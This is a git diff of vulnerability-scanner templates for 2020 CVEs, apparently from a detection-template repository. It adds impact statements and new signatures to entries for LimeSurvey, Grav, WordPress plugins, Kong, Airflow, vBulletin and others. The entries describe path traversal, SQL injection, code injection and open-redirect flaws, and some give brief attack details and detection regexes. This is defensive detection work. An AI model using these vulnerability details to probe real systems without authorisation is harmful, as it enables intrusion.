   description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.
   remediation: |
     Upgrade to the latest version of LimeSurvey (4.1.12 or higher) which includes a fix for this vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009f616147430afd710b40236816a9fd007576d94f12db7efcda77689c75070619022026cc412fe58d17b355b39dc3504696402ec614e2c3a29ee425cb5bc051b45fc0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201c6201da0c2acaf566c40e21a8ef6415b6b7b89db3a31afac7acc840d6b4d45c02204d742e25d959fd3e1d56355ca0ba995ae88a147da881ad2a7b570048d6939975:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml
index bd744f3bad..3375043293 100644
--- a/http/cves/2020/CVE-2020-11529.yaml
+++ b/http/cves/2020/CVE-2020-11529.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Upgrade Grav CMS to version 1.7 or later to fix the open redirect vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a0047304502203e2b01b3c88072647a77df16dafff9c5b0be91f79cc80e480dee1b3a475651e70221008815ea9428df2651167298e4a0cfee2a22d0ae7346bf1667e34f5695b2163524:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100895d5932bdf0074d968c2418998e12feedd0fdabe2106004e045811c37520f500221009cc577b31cd9a79912458a4b1fcb05ac4e5913dadd0d5db285642dc732cf2250:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml
index a07e9ae3b1..5b9a607735 100644
--- a/http/cves/2020/CVE-2020-11530.yaml
+++ b/http/cves/2020/CVE-2020-11530.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: |
     Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "application/javascript")'
           - 'contains(body, "$(document).ready(function()")'
         condition: and
-# digest: 4a0a0047304502203d5e811b13a8315a821544aa60191c283358295508c6f9dc6f7b4b08e0b448d0022100dd5135f5cf54a3813d03b894f7f21956ed70ab36f3c97caa1e156b4a88b474fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220505f6a063021448025b152efd82db0a565f5c5c2b3f04d435acc68e857a41703022042bc587e27a79111d24331f094c8dafa23e72b8bdcde30c2c12f6e935b129441:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml
index 07f56e5d90..10f6f03ef8 100644
--- a/http/cves/2020/CVE-2020-11546.yaml
+++ b/http/cves/2020/CVE-2020-11546.yaml
@@ -5,6 +5,8 @@ info:
   author: Official_BlackHat13
   severity: critical
   description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to the latest version of SuperWebmailer to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220066df2c73af3be1c642052c58089f17a5a45c44b94ee03034c4161329f96f1010221008a5b964b156c0c4b7a3387acec7496edae7b1e302f014405cdc0e85046df79a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cd9995d1ca53307e003ce435e3d92ac2bf2a0cc6a5659c0233913bb3db1d47d202201509d233d1c1eb0b8bd6e9aacfcdacfa15e5974b40b8ed864d498c653f446356:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml
index aae66dbcfd..71e21c7f7a 100644
--- a/http/cves/2020/CVE-2020-11547.yaml
+++ b/http/cves/2020/CVE-2020-11547.yaml
@@ -5,6 +5,8 @@ info:
   author: x6263
   severity: medium
   description: PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the PRTG Network Monitor.
   remediation: |
     Upgrade PRTG Network Monitor to version 20.1.57.1745 or higher to mitigate the information disclosure vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207244febfb8c11fabff28f5b9f903bd1557c6beac237619e2a8dde5da10fa65c802202bfdb77010b95ebbaba20625d0acd0609bf35f3fe5675f9c44645c11bbe07741:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b2b02a0eea6043be861d120eee9b050f205ab29e62c1ad67afc341754e04770002203e8f015d82891830fb1225ac0a361cb258ed06d3c4d116306237b078682c7778:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml
index e470fbeedc..42736d8204 100644
--- a/http/cves/2020/CVE-2020-11710.yaml
+++ b/http/cves/2020/CVE-2020-11710.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1.
+  impact: |
+    Remote attackers can gain unauthorized administrative access to the Kong Admin API.
   remediation: |
     Upgrade to Kong version 2.0.3 or later to fix the vulnerability and ensure proper authentication and access control mechanisms are in place.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e9b09e685bdd9a56772e8a05c44a6b40133226626878cbf6282361baae8575b5022100a76475ed41dc466ac2edd3c8dc7d710114909c99cedcffaf91f76249d8701e7c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022061b6bc97df02bac3f821f7a82a3d9b0fc8a97e4fa98b6956e08dab0d2d2afaab0221008237f8e07333632d94d39627e5e9578d0e517827bf9f09aa82bdd1b143423b72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml
index b183461fa9..bf793cd350 100644
--- a/http/cves/2020/CVE-2020-11738.yaml
+++ b/http/cves/2020/CVE-2020-11738.yaml
@@ -8,6 +8,8 @@ info:
     WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two
     versions v1.3.24 and v1.3.26, the vulnerability wasn't
     present in versions 1.3.22 and before.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.
   remediation: |
     Update the WordPress Duplicator plugin to the latest version (1.3.27 or higher) to mitigate the vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100efd4d83bd5c4f023e00eb49f141d19653360a6e7640ad37572407d4220ddee9b022022997ffcc38e716421f2b6a75fcf972dee14464e3f3974c4315cdfa416a05923:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202da5cefe95302e17bca0ab31690ab251668bcb0c1958516e963c1f199c5bd2200220309329e1a47a40d0a1f9965b230293da8a70760f5e640ca22ccefecddb09c0f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml
index 1cb9f9f622..ea3b44b2ef 100644
--- a/http/cves/2020/CVE-2020-11798.yaml
+++ b/http/cves/2020/CVE-2020-11798.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.
+  impact: |
+    An attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage.
   remediation: |
     Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022039e3f1531a0b187008af8d49425fd4e1225ac183e3d4555c47de441e10b85f0a02200da7236424bbfa74d66fdf6106ce7dd8e1ca3ec20b9b8ed615086addab4a558e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008e30eca0fad46219ad6283c58fa8e0836b0c637413b323e814c10a27a2aa5868022100a70f614364fd4614c781e48cc970e6d794b143085922559035b5e65a9d70c16e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml
index 4d25e4ab74..12960bb425 100644
--- a/http/cves/2020/CVE-2020-11853.yaml
+++ b/http/cves/2020/CVE-2020-11853.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of Micro Focus Operations Bridge Manager.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203cb259055f92c6da1c22f9c39035b210ec21be325b8e8ef0b7ce305081e711dd0220210e85dabcb3335fbbb5832555986c8691ddd86428d5428f59b85b74f0882dec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e75ff3a126e9290629957921542c08b1a54c22a516c64eee8e4c5cc1852d70da0220661cf92608258f3194e4c83ea71357e40478bc0b449762a5f5d9a22f3e763d94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml
index d04a3b6d8a..90d99fc8a0 100644
--- a/http/cves/2020/CVE-2020-11854.yaml
+++ b/http/cves/2020/CVE-2020-11854.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Micro Focus to fix this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201215f9b427cb147a70d8c62a3458c53d74789fe439f47f7a22f3ecb6f6358ec4022100cb044b4af6eb16da2722cc8b8a72a8bbe9a658b8ed8b1f946b5ea4b19671fad8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202c86ea33bdd2f8ff65a230f1a30351641b6440c837ee39da0cc65dbc7be3cd85022029422ab3010d50e2647179a9724493c62c628acfb6d9c2606adbf0724061e74b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml
index 85ef736c37..d52bb3ec5b 100644
--- a/http/cves/2020/CVE-2020-11978.yaml
+++ b/http/cves/2020/CVE-2020-11978.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: high
   description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
   reference:
     - https://github.com/pberba/CVE-2020-11978
@@ -66,4 +68,4 @@ http:
           - '"execution_date":"([0-9-A-Z:+]+)"'
         internal: true
         part: body
-# digest: 490a0046304402203314b95884b3e2c54ff122d6e544b5b180e8ce24980af42fa9af4ee5e7251c2c02200e7420cf1274143856cb57dbe00899fce33f19a55e484bcf4c35a34de405dfdf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100894df216fd8992e0686f4db3be7528bf3ab70a672ecdf1f82dceecb764a7cc93022100804fd55067e0ad962b4db1a60194ef46f9ce921c1b3b55317aad8238c3e599c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml
index 0d07cdeb72..8d3792e8ac 100644
--- a/http/cves/2020/CVE-2020-11991.yaml
+++ b/http/cves/2020/CVE-2020-11991.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: Apache Cocoon 2.1.12 is susceptible to  XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution.
   remediation: Upgrade to Apache Cocoon 2.1.13 or later.
   reference:
     - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ad88896b9bf6a294710429cffc96daecb012b73ed383cbba1cb37c3d5df40360022100fc1363fde173d006eda762cb9f8c47e54d34920851f4877dc2e307620119e4cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a639b8232758e16c619c026b45aa875a67a267dd6f54b5a4e6376073f65413ed022100faa22bb300e50b719d6f79d596c9e33b112f09c409ca3992ec578495c3b37b98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml
index f8c31c51c3..73a55cf927 100644
--- a/http/cves/2020/CVE-2020-12054.yaml
+++ b/http/cves/2020/CVE-2020-12054.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of WordPress Catch Breadcrumb plugin (1.5.4 or higher) to mitigate the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bc67e0ed7daea196dabaa6571e54e646ff94e83a2001c81169c970bf56d3ae48022100b9ce4df0da22f34655b32d2152c8d041a9d5352d7a8e7423f7f65a0e1f3b6d1b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008d3278d76cbf41f4e5a28ba3b7d5f38b187af8e026a891abc644ab7f0022504502203d86828d99e9f487ff7f031c610b1f682e07cd7be002fd25762c1e8e4c06dd0a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml
index 2258896a1f..bba5aa18d1 100644
--- a/http/cves/2020/CVE-2020-12116.yaml
+++ b/http/cves/2020/CVE-2020-12116.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: high
   description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
           - "(?m)/cachestart/.*/jquery/"
         internal: true
         part: body
-# digest: 4a0a004730450220045b752531721e867cd283b02b001b4a41fbfcbf5d51d4d30afcff30f94d71e5022100e491d54c924ad91cb27c2772bced23b604b9871e315fbfde0e166dd3863169d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205e8bc0a76f1d26aecc869bd327f54c13bc408ba89fc395046b7dc822b10bbd8c022054c17deea5497cc972179f4afb880100211cefec8064fa3bf9d8b08f7a7a8824:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml
index ef92c7b36d..09496c70e8 100644
--- a/http/cves/2020/CVE-2020-12127.yaml
+++ b/http/cves/2020/CVE-2020-12127.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e96816da0e8c9135352782028c8482921e0acedcb9ffbda9e65537a01b9376d60221009d4d48ae88fc7ad9fd42a1cc2fd446211d5d0100358e7df11117b23bffc08020:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e1dde552336cb4c291e923792fe5b61f1fae7119c0049fa80d477313d07d22fa02210090ebc36c41e76ecddf25d90b71fe25d613ee9f5e6ebcc74f133dc052c3e374a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml
index 82b999b866..ba23fd5e3f 100644
--- a/http/cves/2020/CVE-2020-12447.yaml
+++ b/http/cves/2020/CVE-2020-12447.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.
+  impact: |
+    An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022014725e3e5842a54cd04d1359a5289eef590224e6d65e5d6ef061f3490dc1bf600220133c9190c1f2c2263c2e517d0563bde27ead67f1d4336282331278553b6b6b4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bfeb84402e43cdb59522e77383a8989a45db85ce5b8badb255217f3e7238870302203e649c17cd0f4d088371413cffa99f10c3176acb5a4dff3bd42da8d1d4f388f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml
index 995f3b14b8..37c9427179 100644
--- a/http/cves/2020/CVE-2020-12478.yaml
+++ b/http/cves/2020/CVE-2020-12478.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to sensitive information.
   remediation: |
     Upgrade to a patched version of TeamPass or apply the recommended security patches.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022072cbacc922050fc5ee97c4a245dc61329216ddc5738d2194ff46713c50a53626022100dc72aee2f203bd92a8bd7ab905dd17e896fa8f19b14aa36b9b403d2ec47b1b31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cd7fb0aa6ff83a48a5f4dd0c86c63e2ab756aacba7d032d5934b899bd48125f1022100b95fda83f3fa49b880defd0c0ba93c048f1453034a1d77100ec32e1d52174a32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml
index 7eff780776..9133593ec2 100644
--- a/http/cves/2020/CVE-2020-12720.yaml
+++ b/http/cves/2020/CVE-2020-12720.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying system.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: word
         words:
           - "vbulletinrce"
-# digest: 4a0a004730450221009ba2e0cf28310515cf0c4a19241b20eb47b2b79ead145ef5fe22c42b9b2485ac02207046d2d68a467e8c397527e18625787b61270bee7142476b9b92b0a8020faf52:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ea9bc6ba1abb70fea5d5fce0da52e2241d381ae96b17962f68830829dafedff7022100d1a54ec68c9464e68a295014aa00e3c1af67be2eeb36fae7d29d5ff3e2e45fe9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml
index 077441d18b..b6fdebf4c8 100644
--- a/http/cves/2020/CVE-2020-12800.yaml
+++ b/http/cves/2020/CVE-2020-12800.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site.
   remediation: |
     Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability.
   reference:
@@ -72,4 +74,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022036a8f80e3cb332deac4b28da1786fe2efdf11da9e117576f96afd0f4cca5b8ee022100bd7b16bc0802b5fdf7850172080e85e1b5775f9004c43336b7fe673e35a368cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200c0bc4c54a33c98044e7bcfdd5165f326e9381054f693d243cf010ccfbb47bcb022100f6d8b29bc41ba239c22a82fc973adde5fdff7ca3972ade5102e2eb6319e1ec67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml
index b5146f33b6..3145f2f7eb 100644
--- a/http/cves/2020/CVE-2020-13117.yaml
+++ b/http/cves/2020/CVE-2020-13117.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022053cc36971ffa064963081afceaab47cdc1c058d03bad37fae72c7ae44110733702206b2d19f13132a9d0cf051bcfac82334a821c21f6d5110fbb3316d510c404cd22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204f132b88bd03c9f0790213435dcb90201e92219854d63c090ef6dceea1a2969d022100ac453a8617840be00505d72683ef2d00d79644d30b7272baad5824cf56867289:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml
index 18a78321ad..c81f56059b 100644
--- a/http/cves/2020/CVE-2020-13121.yaml
+++ b/http/cves/2020/CVE-2020-13121.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100ca1f1d0ad8d6afb16101285c2c185652cfb8ad977f623681fcf86bea02ee1bdf0220749d410092e0880fc23290209e7c9def4ed257f486e0b45ae9aa92782de56e5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200d03cfcdcc194f2bc0986dd0c296503654fb849e70a3c36c521e84320561259f02204f46c1c33826e82a2ca8eecd77a0b4d4705f95ac93ca6d2ef500e20aef529de2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml
index dfa36e4d7f..e4b5f25401 100644
--- a/http/cves/2020/CVE-2020-13158.yaml
+++ b/http/cves/2020/CVE-2020-13158.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.
   remediation: |
     Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100de56e1ac6e7c78c31d8c142b2fbd6834488ebba59210f79f408ebf9158e14d3d022100c963c591ee37dbe468b3c96f33ba299cc222733e67a651889578a733c98f9769:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd35c329c83474295a46641f3a3e4c70070638c07bbf713b18aefa03a8a9445e02205ea8626ec8ed7a900e60bb3ad0cd1e7098bdd33bbe25c72f47658e29c08f62bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml
index d432261f05..1c1db3662f 100644
--- a/http/cves/2020/CVE-2020-13167.yaml
+++ b/http/cves/2020/CVE-2020-13167.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
   remediation: |
     Upgrade to a patched version of Netsweeper (>=6.4.4) to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
